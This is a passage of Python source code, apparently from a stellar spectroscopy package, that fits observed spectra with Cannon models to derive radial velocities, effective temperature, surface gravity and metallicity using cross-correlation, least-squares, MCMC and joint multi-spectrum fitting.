# Step 2: Load and prepare the Cannon models
#-------------------------------------------
if models is None:
models = cannon.models.copy()
models.prepare(spec)
# Step 3: put on logarithmic wavelength grid
#-------------------------------------------
wavelog = utils.make_logwave_scale(spec.wave,vel=0.0) # get new wavelength solution
obs = spec.interp(wavelog)
# The LSF information will not be correct if using Gauss-Hermite, it uses a Gaussian approximation
# it's okay because the "models" are prepared for the original spectra (above)
# Step 4: get initial RV using cross-correlation with rough sampling of Teff/logg parameter space
#------------------------------------------------------------------------------------------------
dwlog = np.median(dln.slope(np.log10(wavelog)))
# vrel = ( 10**(xshift*dwlog)-1 )*cspeed
maxlag = np.int(np.ceil(np.log10(1+maxvel/cspeed)/dwlog))
maxlag = np.maximum(maxlag,50)
if samples is None:
#teff = [3500.0, 4000.0, 5000.0, 6000.0, 7500.0, 9000.0, 15000.0, 25000.0, 40000.0, 3500.0, 4300.0, 4700.0, 5200.0]
#logg = [4.8, 4.8, 4.6, 4.4, 4.0, 4.0, 4.0, 4.0, 8.0, 0.5, 1.0, 2.0, 3.0]
# temporarily remove WD until that's fixed
teff = [3500.0, 4000.0, 5000.0, 6000.0, 7500.0, 15000.0, 25000.0, 40000.0, 3500.0, 4300.0, 4700.0, 5200.0]
logg = [4.8, 4.8, 4.6, 4.4, 4.0, 4.0, 4.0, 4.0, 0.5, 1.0, 2.0, 3.0]
feh = -0.5
dt = np.dtype([('teff',float),('logg',float),('feh',float)])
samples = np.zeros(len(teff),dtype=dt)
samples['teff'][:] = teff
samples['logg'][:] = logg
samples['feh'][:] = feh
outdtype = np.dtype([('xshift',np.float32),('vrel',np.float32),('vrelerr',np.float32),('ccpeak',np.float32),('ccpfwhm',np.float32),
('chisq',np.float32),('teff',np.float32),('logg',np.float32),('feh',np.float32)])
outstr = np.zeros(len(teff),dtype=outdtype)
if verbose is True: print('TEFF LOGG FEH VREL CCPEAK CHISQ')
for i in range(len(samples)):
m = models([samples['teff'][i],samples['logg'][i],samples['feh'][i]],rv=0,wave=wavelog)
outstr1 = specxcorr(m.wave,m.flux,obs.flux,obs.err,maxlag)
if verbose is True:
print('%7.2f %5.2f %5.2f %5.2f %5.2f %5.2f' % (teff[i],logg[i],feh,outstr1['vrel'][0],outstr1['ccpeak'][0],outstr1['chisq'][0]))
for n in ['xshift','vrel','vrelerr','ccpeak','ccpfwhm','chisq']: outstr[n][i] = outstr1[n]
outstr['teff'][i] = teff[i]
outstr['logg'][i] = logg[i]
outstr['feh'][i] = feh
# Get best fit
bestind = np.argmin(outstr['chisq'])
beststr = outstr[bestind]
bestmodel = models(teff=beststr['teff'],logg=beststr['logg'],feh=beststr['feh'],rv=beststr['vrel'])
if verbose is True:
print('Initial RV fit:')
printpars([beststr['teff'],beststr['logg'],beststr['feh'],beststr['vrel']],[None,None,None,beststr['vrelerr']])
return beststr, bestmodel
def fit_lsq_cannon(spec,models=None,initpar=None,verbose=False):
"""
Least Squares fitting with forward modeling of the spectrum.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
models : list of Cannon models, optional
A list of Cannon models to use. The default is to load all of the Cannon
models in the data/ directory and use those.
initpar : numpy array, optional
Initial estimate for [teff, logg, feh, RV], optional.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Cannon model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = fit_lsq_cannon(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Prepare the spectrum
#-----------------------------
# normalize and mask spectrum
if spec.normalized is False:
spec = utils.specprep(spec)
# Load and prepare the Cannon models
#-------------------------------------------
if models is None:
models = cannon.models.copy()
models.prepare(spec)
# Get initial estimates
if initpar is None:
initpar = np.array([6000.0, 2.5, -0.5, 0.0])
initpar = np.array(initpar).flatten()
# Calculate the bounds
lbounds = np.zeros(4,float)+1e5
ubounds = np.zeros(4,float)-1e5
for p in models:
lbounds[0:3] = np.minimum(lbounds[0:3],np.min(p.ranges,axis=1))
ubounds[0:3] = np.maximum(ubounds[0:3],np.max(p.ranges,axis=1))
lbounds[3] = -1000
ubounds[3] = 1000
bounds = (lbounds, ubounds)
# Make sure RV is in the boundaries
initpar[3] = dln.limit(initpar[3],-999,999)
# function to use with curve_fit
def spec_interp(x,teff,logg,feh,rv):
""" This returns the interpolated model for a given spectrum."""
# The "models" and "spec" must already exist outside of this function
m = models(teff=teff,logg=logg,feh=feh,rv=rv)
if m is None:
return np.zeros(spec.flux.shape,float).flatten()+1e30
return m.flux.flatten()
# Use curve_fit
lspars, lscov = curve_fit(spec_interp, spec.wave.flatten(), spec.flux.flatten(), sigma=spec.err.flatten(),
p0=initpar, bounds=bounds)
# If it hits a boundary then the solution won't change much compared to initpar
# setting absolute_sigma=True gives crazy low lsperror values
lsperror = np.sqrt(np.diag(lscov))
if verbose is True:
print('Least Squares RV and stellar parameters:')
printpars(lspars)
lsmodel = models(teff=lspars[0],logg=lspars[1],feh=lspars[2],rv=lspars[3])
lschisq = np.sqrt(np.sum(((spec.flux-lsmodel.flux)/spec.err)**2)/(spec.npix*spec.norder))
if verbose is True: print('chisq = %5.2f' % lschisq)
# Put it into the output structure
dtype = np.dtype([('pars',float,4),('parerr',float,4),('parcov',float,(4,4)),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['pars'] = lspars
out['parerr'] = lsperror
out['parcov'] = lscov
out['chisq'] = lschisq
return out, lsmodel
def fit_mcmc_cannon(spec,models=None,initpar=None,steps=100,cornername=None,verbose=False):
"""
Fit the spectrum with MCMC.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
models : list of Cannon models, optional
A list of Cannon models to use. The default is to load all of the Cannon
models in the data/ directory and use those.
initpar : numpy array, optional
Initial estimate for [teff, logg, feh, RV], optional.
steps : int, optional
Number of steps to use. Default is 100.
cornername : string, optional
Output filename for the corner plot. If a corner plot is requested, then the
minimum number of steps used is 500.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Cannon model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = fit_mcmc(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Prepare the spectrum
#-----------------------------
# normalize and mask spectrum
if spec.normalized is False:
spec = utils.specprep(spec)
# Load and prepare the Cannon models
#-------------------------------------------
if models is None:
models = cannon.models.copy()
models.prepare(spec)
# Initial estimates
if initpar is None:
initpar = [6000.0, 2.5, -0.5, 0.0]
# Set up the MCMC sampler
ndim, nwalkers = 4, 20
delta = [initpar[0]*0.1, 0.1, 0.1, 0.2]
pos = [initpar + delta*np.random.randn(ndim) for i in range(nwalkers)]
sampler = emcee.EnsembleSampler(nwalkers, ndim, emcee_lnprob_cannon,
args=(spec.wave.flatten(), spec.flux.flatten(), spec.err.flatten(), models, spec))
if cornername is not None: steps=np.maximum(steps,500) # at least 500 steps
out = sampler.run_mcmc(pos, steps)
samples = sampler.chain[:, np.int(steps/2):, :].reshape((-1, ndim))
# Get the median and stddev values
pars = np.zeros(ndim,float)
parerr = np.zeros(ndim,float)
if verbose is True: print('MCMC values:')
names = ['Teff','logg','[Fe/H]','Vrel']
for i in range(ndim):
t=np.percentile(samples[:,i],[16,50,84])
pars[i] = t[1]
parerr[i] = (t[2]-t[0])*0.5
if verbose is True: printpars(pars,parerr)
# The maximum likelihood parameters
bestind = np.unravel_index(np.argmax(sampler.lnprobability),sampler.lnprobability.shape)
pars_ml = sampler.chain[bestind[0],bestind[1],:]
mcmodel = models(teff=pars[0],logg=pars[1],feh=pars[2],rv=pars[3])
mcchisq = np.sqrt(np.sum(((spec.flux-mcmodel.flux)/spec.err)**2)/(spec.npix*spec.norder))
# Put it into the output structure
dtype = np.dtype([('pars',float,4),('pars_ml',float,4),('parerr',float,4),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['pars'] = pars
out['pars_ml'] = pars_ml
out['parerr'] = parerr
out['chisq'] = mcchisq
# Corner plot
if cornername is not None:
matplotlib.use('Agg')
fig = corner.corner(samples, labels=["T$_eff$", "$\log{g}$", "[Fe/H]", "Vrel"], truths=pars)
plt.savefig(cornername)
plt.close(fig)
print('Corner plot saved to '+cornername)
return out,mcmodel
def fit_cannon(spectrum,models=None,verbose=False,mcmc=False,figfile=None,cornername=None,
retpmodels=False,nthreads=None,notweak=False,tpoly=False,tpolyorder=3):
"""
Fit the spectrum. Find the best RV and stellar parameters using the Cannon models.
Parameters
----------
spectrum : Spec1D object
The observed spectrum to match.
models : list of Cannon models, optional
A list of Cannon models to use. The default is to load all of the Cannon
models in the data/ directory and use those.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
mcmc : bool, optional
Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties.
This is False by default.
figfile : string, optional
The filename for a diagnostic plot showing the observed spectrum, model
spectrum and the best-fit parameters.
cornername : string, optional
The filename for a "corner" plot showing the posterior distributions from
the MCMC run.
retpmodels : bool, optional
Return the prepared moels.
nthreads : int, optional
The number of threads to use. By default the number of threads is not limited.
notweak : boolean, optional
Don't tweak the observed continuum using the model. Default is False.
tpoly : boolean, optional
Use a low-order polynomial fit for continuum tweaking. Default is False,
it uses Gaussian smoothing instead.
tpolyorder : int, optional
Polynomial order to use for continuum tweaking if tpoly=True.
Default is 3 (cubic).
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
model : Spec1D object
The best-fitting Cannon model spectrum (as Spec1D object).
specm : Spec1D object
The observed spectrum with discrepant and outlier pixels masked.
pmodels : DopplerCannonModelSet
The prepared Doppler Cannon models, only if retpmodels=True.
Example
-------
.. code-block:: python
out, model = fit_cannon(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Turn off the Cannon's info messages
tclogger = logging.getLogger('thecannon.utils')
tclogger.disabled = True
# Set threads
if nthreads is not None:
os.environ["OMP_NUM_THREADS"] = str(nthreads)
os.environ["OPENBLAS_NUM_THREADS"] = str(nthreads)
os.environ["MKL_NUM_THREADS"] = str(nthreads)
os.environ["VECLIB_MAXIMUM_THREADS"] = str(nthreads)
os.environ["NUMEXPR_NUM_THREADS"] = str(nthreads)
t0 = time.time()
if verbose: print('Fitting Cannon model to spectrum with parameters: '+', '.join(['Teff','logg','[Fe/H]','RV']))
# Make internal copy
spec = spectrum.copy()
# Step 1: Prepare the spectrum
#-----------------------------
# Normalize and mask the spectrum
spec = utils.specprep(spec)
# Mask out any large positive outliers, e.g. badly subtracted sky lines
specm = utils.maskoutliers(spec,verbose=verbose)
# Step 2: Load and prepare the Cannon models
#-------------------------------------------
if models is None: models = cannon.models.copy()
models.prepare(specm)
## NOT interpolated onto the observed wavelength scale
# Step 3: Get initial RV using cross-correlation with rough sampling of Teff/logg parameter space
#------------------------------------------------------------------------------------------------
beststr, xmodel = fit_xcorrgrid_cannon(specm,models,verbose=verbose,maxvel=1000.0)
# Step 4: Get better Cannon stellar parameters using initial RV
#--------------------------------------------------------------
# put observed spectrum on rest wavelength scale
# get cannon model for "best" teff/logg/feh values
# run cannon.test() on the spectrum and variances
# just shift the observed wavelengths to rest, do NOT interpolate the spectrum
#restwave = obs.wave*(1-beststr['vrel']/cspeed)
restwave = specm.wave*(1-beststr['vrel']/cspeed)
bestmodel = models.get_best_model([beststr['teff'],beststr['logg'],beststr['feh']])
bestmodelinterp = bestmodel.interp(restwave)
labels0, cov0, meta0 = bestmodelinterp.test(specm)
# Make sure the labels are within the ranges
labels0 = labels0.flatten()
for i in range(3): labels0[i]=dln.limit(labels0[i],bestmodelinterp.ranges[i,0],bestmodelinterp.ranges[i,1])
bestmodelspec0 = bestmodelinterp(labels0)
if verbose is True:
print('Initial Cannon stellar parameters using initial RV')
printpars(labels0)
# Tweak the continuum normalization
if notweak is False:
specm = tweakcontinuum(specm,bestmodelspec0,usepoly=tpoly,polyorder=tpolyorder)
# Mask out very discrepant pixels when compared to the best-fit model
specm = utils.maskdiscrepant(specm,bestmodelspec0,verbose=verbose)
# Refit the Cannon
labels, cov, meta = bestmodelinterp.test(specm)
# Make sure the labels are within the ranges
labels = labels.flatten()
for i in range(3): labels[i]=dln.limit(labels[i],bestmodelinterp.ranges[i,0],bestmodelinterp.ranges[i,1])
bestmodelspec = bestmodelinterp(labels)
if verbose is True:
print('Initial Cannon stellar parameters using initial RV and Tweaking the normalization')
printpars(labels)
# Step 5: Improved RV using better Cannon template
#-------------------------------------------------
wavelog = utils.make_logwave_scale(specm.wave,vel=0.0) # get new wavelength solution
obs = specm.interp(wavelog)
m = models.get_best_model(labels).interp(wavelog)(labels,rv=0)
dwlog = np.median(dln.slope(np.log10(wavelog)))
# vrel = ( 10**(xshift*dwlog)-1 )*cspeed
maxlag = np.int(np.ceil(np.log10(1+1000.0/cspeed)/dwlog))
maxlag = np.maximum(maxlag,50)
outstr2 = specxcorr(m.wave,m.flux,obs.flux,obs.err,maxlag)
outdtype = np.dtype([('xshift',np.float32),('vrel',np.float32),('vrelerr',np.float32),('ccpeak',np.float32),('ccpfwhm',np.float32),
('chisq',np.float32),('teff',np.float32),('logg',np.float32),('feh',np.float32)])
beststr2= np.zeros(1,dtype=outdtype)
for n in ['xshift','vrel','vrelerr','ccpeak','ccpfwhm','chisq']: beststr2[n] = outstr2[n]
beststr2['teff'] = labels[0]
beststr2['logg'] = labels[1]
beststr2['feh'] = labels[2]
# Step 6: Improved Cannon stellar parameters
#-------------------------------------------
restwave = specm.wave*(1-beststr['vrel']/cspeed)
bestmodel = models.get_best_model([beststr2['teff'],beststr2['logg'],beststr2['feh']])
bestmodelinterp = bestmodel.interp(restwave)
labels2, cov2, meta2 = bestmodelinterp.test(specm)
# Make sure the labels are within the ranges
labels2 = labels2.flatten()
for i in range(3): labels2[i]=dln.limit(labels2[i],bestmodelinterp.ranges[i,0],bestmodelinterp.ranges[i,1])
bestmodelspec2 = bestmodelinterp(labels2)
if verbose is True:
print('Improved RV and Cannon stellar parameters:')
printpars(np.concatenate((labels2,beststr2['vrel'])),[None,None,None,beststr2['vrelerr']])
# Step 7: Least Squares fitting with forward modeling
#----------------------------------------------------
# Get best model so far
m = models(teff=beststr2['teff'],logg=beststr2['logg'],feh=beststr2['feh'],rv=beststr2['vrel'])
# Tweak the continuum
if notweak is False:
specm = tweakcontinuum(specm,m,usepoly=tpoly,polyorder=tpolyorder)
# Get initial estimates
initpar = [beststr2['teff'],beststr2['logg'],beststr2['feh'],beststr2['vrel']]
initpar = np.array(initpar).flatten()
lsout, lsmodel = fit_lsq_cannon(specm,models,initpar=initpar,verbose=verbose)
lspars = lsout['pars'][0]
lsperror = lsout['parerr'][0]
# Step 8: Run fine grid in RV, forward modeling
#----------------------------------------------
maxv = np.maximum(beststr2['vrel'][0],20.0)
vel = dln.scale_vector(np.arange(30),lspars[3]-maxv,lspars[3]+maxv)
chisq = np.zeros(len(vel))
for i,v in enumerate(vel):
m = models(teff=lspars[0],logg=lspars[1],feh=lspars[2],rv=v)
chisq[i] = np.sqrt(np.sum(((specm.flux-m.flux)/specm.err)**2)/(specm.npix*specm.norder))
vel2 = dln.scale_vector(np.arange(300),lspars[3]-maxv,lspars[3]+maxv)
chisq2 = dln.interp(vel,chisq,vel2)
bestind = np.argmin(chisq2)
finerv = vel2[bestind]
finechisq = chisq2[bestind]
if verbose is True:
print('Fine grid best RV = %5.2f km/s' % finerv)
print('chisq = %5.2f' % finechisq)
# Final parameters and uncertainties (so far)
fpars = lspars
fperror = lsperror
fpars[3] = finerv
fchisq = finechisq
fmodel = models(teff=lspars[0],logg=lspars[1],feh=lspars[2],rv=finerv)
# Step 9: MCMC
#--------------
if (mcmc is True) | (cornername is not None):
mcout, mcmodel = fit_mcmc_cannon(specm,models,fpars,verbose=verbose,cornername=cornername)
# Use these parameters
fpars = mcout['pars'][0]
fperror = mcout['parerr'][0]
fchisq = mcout['chisq'][0]
fmodel = mcmodel
# Construct the output
#---------------------
bc = specm.barycorr()
# Check if we should apply the barycentric correction
# some spectra already this applied to the wavelength solution
nobc = False
if hasattr(spec,'nobc'):
nobc = spec.nobc
# Apply barycentric correction
if nobc is False:
vhelio = fpars[3] + bc
else:
vhelio = fpars[3]
if verbose is True:
print('NOT applying Barycentric Correction')
if verbose is True:
print('Final parameters:')
printpars(fpars[0:3],fperror[0:3])
print('Vhelio = %6.2f +/- %5.2f km/s' % (vhelio,fperror[3]))
print('BC = %5.2f km/s' % bc)
print('chisq = %5.2f' % fchisq)
dtype = np.dtype([('vhelio',np.float32),('vrel',np.float32),('vrelerr',np.float32),
('teff',np.float32),('tefferr',np.float32),('logg',np.float32),('loggerr',np.float32),
('feh',np.float32),('feherr',np.float32),('chisq',np.float32),('bc',np.float32)])
out = np.zeros(1,dtype=dtype)
out['vhelio'] = vhelio
out['vrel'] = fpars[3]
out['vrelerr'] = fperror[3]
out['teff'] = fpars[0]
out['tefferr'] = fperror[0]
out['logg'] = fpars[1]
out['loggerr'] = fperror[1]
out['feh'] = fpars[2]
out['feherr'] = fperror[2]
out['chisq'] = fchisq
out['bc'] = bc
# Make diagnostic figure
if figfile is not None:
# Apply continuum tweak to original spectrum as well
cratio = specm.cont/spec.cont
orig = spec.copy()
orig.flux /= cratio
orig.err /= cratio
orig.cont *= cratio
# Make the diagnostic figure
specfigure(figfile,specm,fmodel,out,original=orig,verbose=verbose)
# How long did this take
if verbose is True: print('dt = %5.2f sec.' % (time.time()-t0))
# Return the prpared models
if retpmodels is True:
return out, fmodel, specm, models
return out, fmodel, specm
def multifit_lsq_cannon(speclist,modlist,initpar=None,verbose=False):
"""
Least Squares fitting with forward modeling of multiple spectra simultaneously.
Parameters
----------
speclist : Spec1D object
List of the observed spectra to match.
modlist : list of Doppler Cannon models
A list of the prepare Doppler Cannon models to use, one set for each observed
spectrum.
initpar : numpy array, optional
Initial estimate for [teff, logg, feh, RV], optional.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Cannon model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = multifit_lsq(speclist,modlist,initpar)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
nspec = len(speclist)
## Prepare the spectrum
##-----------------------------
## normalize and mask spectrum
#if spec.normalized is False: spec.normalize()
#if spec.mask is not None:
# # Set errors to high value, leave flux alone
# spec.err[spec.mask] = 1e30
## Load and prepare the Cannon models
##-------------------------------------------
#if models is None: models = cannon.models.prepare(spec)
# Get initial estimates
npar = 3+nspec
if initpar is None:
initpar = np.zeros(npar,float)
initpar[0:3] = np.array([6000.0, 2.5, -0.5])
# Calculate the bounds
lbounds = np.zeros(npar,float)+1e5
ubounds = np.zeros(npar,float)-1e5
for p in modlist[0]:
lbounds[0:3] = np.minimum(lbounds[0:3],np.min(p.ranges,axis=1))
ubounds[0:3] = np.maximum(ubounds[0:3],np.max(p.ranges,axis=1))
lbounds[3:] = -1000
ubounds[3:] = 1000
bounds = (lbounds, ubounds)
# function to use with curve_fit
def multispec_interp(x,*argv):
""" This returns the interpolated model for a given spectrum."""
# The "models" and "spec" must already exist outside of this function
#print(argv)
teff = argv[0]
logg = argv[1]
feh = argv[2]
vrel = argv[3:]
npix = len(x)
nspec = len(vrel)
flux = np.zeros(npix,float)
cnt = 0
for i in range(nspec):
npx = speclist[i].npix*speclist[i].norder
m = modlist[i]([teff,logg,feh],rv=vrel[i])
if m is not None:
flux[cnt:cnt+npx] = m.flux.T.flatten()
else:
flux[cnt:cnt+npx] = 1e30
cnt += npx
return flux
def multispec_interp_jac(x,*argv):
""" Compute the Jacobian matrix (an m-by-n matrix, where element (i, j)
is the partial derivative of f[i] with respect to x[j]). """
# We only have to recompute the full model if teff/logg/feh are being modified
# otherwise we just modify one spectrum's model
#print('jac')
#print(argv)
relstep = 0.02
npix = len(x)
npar = len(argv)
teff = argv[0]
logg = argv[1]
feh = argv[2]
vrel = argv[3:]
# Initialize jacobian matrix
jac = np.zeros((npix,npar),float)
# Model at current values
f0 = multispec_interp(x,*argv)
# Compute full models for teff/logg/feh
for i in range(3):
pars = np.array(copy.deepcopy(argv))
step = relstep*pars[i]
pars[i] += step
f1 = multispec_interp(x,*pars)
# Hit an edge, try the negative value instead
nbd = np.sum(f1>1000)
if nbd>1000:
pars = np.array(copy.deepcopy(argv))
step = -relstep*pars[i]
pars[i] += step
f1 = multispec_interp(x,*pars)
jac[:,i] = (f1-f0)/step
# Compute model for single spectra
nspec = len(speclist)
cnt = 0
for i in range(nspec):
vrel1 = vrel[i]
step = 1.0
vrel1 += step
npx = speclist[i].npix*speclist[i].norder
m = modlist[i]([teff,logg,feh],rv=vrel1)
if m is not None:
jac[cnt:cnt+npx,i] = (m.flux.T.flatten()-f0[cnt:cnt+npx])/step
else:
jac[cnt:cnt+npx,i] = 1e30
cnt += npx
return jac
# We are fitting 3 stellar parameters and Nspec relative RVs
# Put all of the spectra into a large 1D array
ntotpix = 0
for s in speclist:
ntotpix += s.npix*s.norder
wave = np.zeros(ntotpix)
flux = np.zeros(ntotpix)
err = np.zeros(ntotpix)
cnt = 0
for i in range(nspec):
sp = speclist[i]
npx = sp.npix*sp.norder
wave[cnt:cnt+npx] = sp.wave.T.flatten()
flux[cnt:cnt+npx] = sp.flux.T.flatten()
err[cnt:cnt+npx] = sp.err.T.flatten()
cnt += npx
# Use curve_fit
diff_step = np.zeros(npar,float)
diff_step[:] = 0.02
lspars, lscov = curve_fit(multispec_interp, wave, flux, sigma=err, p0=initpar, bounds=bounds, jac=multispec_interp_jac)
#lspars, lscov = curve_fit(multispec_interp, wave, flux, sigma=err, p0=initpar, bounds=bounds, diff_step=diff_step)
#lspars, lscov = curve_fit(multispec_interp, wave, flux, sigma=err, p0=initpar, bounds=bounds)
# If it hits a boundary then the solution won't chance much compared to initpar
# setting absolute_sigma=True gives crazy low lsperror values
lsperror = np.sqrt(np.diag(lscov))
if verbose is True:
print('Least Squares RV and stellar parameters:')
printpars(lspars)
lsmodel = multispec_interp(wave,*lspars)
lschisq = np.sqrt(np.sum(((flux-lsmodel)/err)**2)/len(lsmodel))
if verbose is True: print('chisq = %5.2f' % lschisq)
# Put it into the output structure
dtype = np.dtype([('pars',float,npar),('parerr',float,npar),('parcov',float,(npar,npar)),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['pars'] = lspars
out['parerr'] = lsperror
out['parcov'] = lscov
out['chisq'] = lschisq
return out, lsmodel
def jointfit_cannon(speclist,models=None,mcmc=False,snrcut=10.0,saveplot=False,verbose=False,
outdir=None,nthreads=None,notweak=False,tpoly=False,tpolyorder=3):
"""
This fits a Cannon model to multiple spectra of the same star.
Parameters
----------
speclist : Spec1D object
The observed spectrum to match.
models : list of Cannon models, optional
A list of Cannon models to use. The default is to load all of the Cannon
models in the data/ directory and use those.
mcmc : bool, optional
Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties.
This is only run the individual spectra are being fit.
This is False by default.
snrcut : int, optional
S/N cut to fit individual spectra in the first step. The default is snrcut=10.
saveplot : bool, optional
Save output plots.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
outdir : str, optional
The directory for output files. The default is to use the current directory.
nthreads : int, optional
The number of threads to use. By default the number of threads is not limited.
notweak : boolean, optional
Don't tweak the observed continuum using the model. Default is False.
tpoly : boolean, optional
Use a low-order polynomial fit for continuum tweaking. Default is False,
it uses Gaussian smoothing instead.
tpolyorder : int, optional
Polynomial order to use for continuum tweaking if tpoly=True.
Default is 3 (cubic).
Returns
-------
sumstr : numpy structured array
Summary catalog of final best-fit values.
final :
Final best-fit values for each individual spectrum.
bmodel : List of Spec1D object
List of best-fitting model spectra.
specmlist : list of Spec1D object
List of the observed spectrua with discrepant and outlier pixels masked.
Example
-------
.. code-block:: python
sumstr, final, bmodel, specmlist = jointfit_cannon(speclist)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
nspec = len(speclist)
t0 = time.time()
# Set threads
if nthreads is not None:
os.environ["OMP_NUM_THREADS"] = str(nthreads)
os.environ["OPENBLAS_NUM_THREADS"] = str(nthreads)
os.environ["MKL_NUM_THREADS"] = str(nthreads)
os.environ["VECLIB_MAXIMUM_THREADS"] = str(nthreads)
os.environ["NUMEXPR_NUM_THREADS"] = str(nthreads)
if verbose: print('Jointly fitting Cannon model to '+str(nspec)+' spectra with parameters: '+
', '.join(['Teff','logg','[Fe/H]'])+' and RV for each spectrum')
# If list of filenames input, then load them
# Creating catalog of info on each spectrum
dt = np.dtype([('filename',np.str,300),('snr',float),('vhelio',float),('vrel',float),('vrelerr',float),
('teff',float),('tefferr',float),('logg',float),('loggerr',float),('feh',float),
('feherr',float),('chisq',float),('bc',float)])
info = np.zeros(nspec,dtype=dt)
for n in dt.names: info[n] = np.nan
for i,s in enumerate(speclist):
info['filename'][i] = s.filename
info['snr'][i] = s.snr
# Make sure some spectra pass the S/N cut
hisnr, nhisnr = dln.where(info['snr']>snrcut)
if nhisnr < np.ceil(0.25*nspec):
snr = np.flip(np.sort(info['snr']))
snrcut = snr[np.maximum(np.int(np.ceil(0.25*nspec)),np.minimum(4,nspec-1))]
if verbose is True:
print('Lowering S/N cut to %5.1f so at least 25%% of the spectra pass the cut' % snrcut)
# Step 1) Loop through each spectrum and run fit()
if verbose is True: print('Step #1: Fitting the individual spectra')
specmlist = []
modlist = []
for i in range(len(speclist)):
spec = speclist[i].copy()
if verbose is True:
print('Fitting spectrum '+str(i+1))
print(speclist[i].filename)
# Only do this for spectra with S/N>10 or 15
if spec.snr>snrcut:
# Save the plot, figure the output figure filename
figfile = None
if saveplot is True:
fdir, base, ext = utils.splitfilename(speclist[i].filename)
figfile = base+'_dopfit.png'
if outdir is not None: figfile = outdir+'/'+figfile
if (outdir is None) & (fdir != ''): figfile = fdir+'/'+figfile
# Fit the spectrum
out, model, specm, pmodels = fit_cannon(spec,verbose=verbose,mcmc=mcmc,figfile=figfile,
retpmodels=True,notweak=notweak,tpoly=tpoly,
tpolyorder=tpolyorder)
modlist.append(pmodels.copy())
del pmodels
specmlist.append(specm.copy())
del specm
info['vhelio'][i] = out['vhelio']
info['vrel'][i] = out['vrel']
info['vrelerr'][i] = out['vrelerr']
info['teff'][i] = out['teff']
info['tefferr'][i] = out['tefferr']
info['logg'][i] = out['logg']
info['loggerr'][i] = out['loggerr']
info['feh'][i] = out['feh']
info['feherr'][i] = out['feherr']
info['chisq'][i] = out['chisq']
info['bc'][i] = out['bc']
else:
if verbose is True:
print('Skipping: S/N=%6.1f below threshold of %6.1f. Loading spectrum and preparing models.' % (spec.snr,snrcut))
modlist.append(cannon.models.copy().prepare(speclist[i]))
sp = speclist[i].copy()
sp = utils.specprep(sp) # mask and normalize
# Mask outliers
sp = utils.maskoutliers(sp)
specmlist.append(sp)
# at least need BC
info['bc'][i] = speclist[i].barycorr()
if verbose is True: print(' ')
# Step 2) Find weighted stellar parameters
if verbose is True: print('Step #2: Getting weighted stellar parameters')
gd, ngd = dln.where(np.isfinite(info['chisq']))
if ngd>0:
pars = ['teff','logg','feh','vhelio']
parerr = ['tefferr','loggerr','feherr','vrelerr']
wtpars = np.zeros(4,float)
for i in range(len(pars)):
p = info[pars[i]][gd]
perr = info[parerr[i]][gd]
gdp,ngdp,bdp,nbdp = dln.where(perr > 0.0,comp=True)
# Weighted by 1/perr^2
if ngdp>0:
if (nbdp>0): perr[bdp] = np.max(perr[gdp])*2
mnp = dln.wtmean(p,perr)
wtpars[i] = mnp
# Unweighted
else:
wtpars[i] = np.mean(p)
if verbose is True:
print('Initial weighted parameters are:')
printpars(wtpars)
else:
wtpars = np.zeros(4,float)
wtpars[0] = 6000.0
wtpars[1] = 4.0
wtpars[2] = -0.5
wtpars[3] = 0.0
vscatter0 = 999999.
if verbose is True:
print('No good fits. Using these as intial guesses:')
printpars(wtpars)
# Make initial guesses for all the parameters, 3 stellar paramters and Nspec relative RVs
initpar1 = np.zeros(3+nspec,float)
initpar1[0:3] = wtpars[0:3]
# the default is to use mean vhelio + BC for all visit spectra
initpar1[3:] = wtpars[3]-info['bc'] # vhelio = vrel + BC
# Use the Vrel values from the initial fitting if they are accurate enough
gdinit,ngdinit = dln.where(np.isfinite(info['vrel']) & (info['snr']>5))
if ngdinit>0:
initpar1[gdinit+3] = info['vrel'][gdinit]
# Step 3) Refit all spectra simultaneously fitting stellar parameters and RVs
if verbose is True:
print(' ')
print('Step #3: Fitting all spectra simultaneously')
out1, fmodels1 = multifit_lsq_cannon(specmlist,modlist,initpar1)
stelpars1 = out1['pars'][0,0:3]
stelparerr1 = out1['parerr'][0,0:3]
vrel1 = out1['pars'][0,3:]
vrelerr1 = out1['parerr'][0,3:]
vhelio1 = vrel1+info['bc']
medvhelio1 = np.median(vhelio1)
vscatter1 = dln.mad(vhelio1)
verr1 = vscatter1/np.sqrt(nspec)
if verbose is True:
print('Parameters:')
printpars(stelpars1)
print('Vhelio = %6.2f +/- %5.2f km/s' % (medvhelio1,verr1))
print('Vscatter = %6.3f km/s' % vscatter1)
print(vhelio1)
# Step 4) Tweak continua and remove outliers
if verbose is True:
print(' ')
print('Step #4: Tweaking continuum and masking outliers')
if notweak is False:
for i,spm in enumerate(specmlist):
bestm = modlist[i](stelpars1,rv=vrel1[i])
# Tweak the continuum normalization
spm = tweakcontinuum(spm,bestm,usepoly=tpoly,polyorder=tpolyorder)
# Mask out very discrepant pixels when compared to the best-fit model
spm = utils.maskdiscrepant(spm,bestm,verbose=verbose)
specmlist[i] = spm.copy()
else:
if verbose: print('Skipping tweaking')
